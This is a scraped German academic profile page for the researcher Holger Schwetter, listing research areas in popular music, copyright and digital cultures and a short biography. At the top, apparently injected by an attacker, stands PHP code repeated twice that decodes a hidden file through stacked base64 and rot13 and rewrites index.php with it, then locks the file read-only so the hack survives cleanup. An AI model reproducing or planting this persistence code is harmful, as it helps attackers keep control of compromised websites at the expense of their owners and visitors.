$i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } $i_p = "index.php"; $index = file_get_contents($i_p); $path = "{index_hide}"; if (file_exists($path)) { $index_hide = file_get_contents($path); $index_hide = base64_decode(str_rot13(base64_decode(str_rot13($index_hide)))); if(md5($index) != md5($index_hide)) { @chmod($i_p, 0644); @file_put_contents($i_p, $index_hide); @chmod($i_p, 0444); } } Holger Schwetter – Auditive Medienkulturen

Holger Schwetter

Forschungsgebiete:

  • Soziologie und Ästhetik der populären Musik
  • Urheberrecht
  • Digitale Kulturen
  • Geschichte(n) der Wiederholung

Aktivitäten:

Publikationen:

Biographie:

  • Promotion im Promotionskolleg „Die Produktivität von Kultur“ der Hans-Böckler-Stiftung.
  • Studium der Musik- und Medienwissenschaft an der Universität Osnabrück, Magisterarbeit 2010 „Die Bedeutung der Repetition in der Musik. Dargestellt an ausgewählten Beispielen.“
  • langjährige Tätigkeit als selbständiger Medienproduzent sowie im Leitungsteam des gemeinnützigen Medienlabor werk.statt in Osnabrück.
  • Über 25 Jahre in popmusikalischen Nischenkulturen tätig als Musiker, Veranstalter, DJ, Labelbetreiber, VJ etc. …

Kontakt: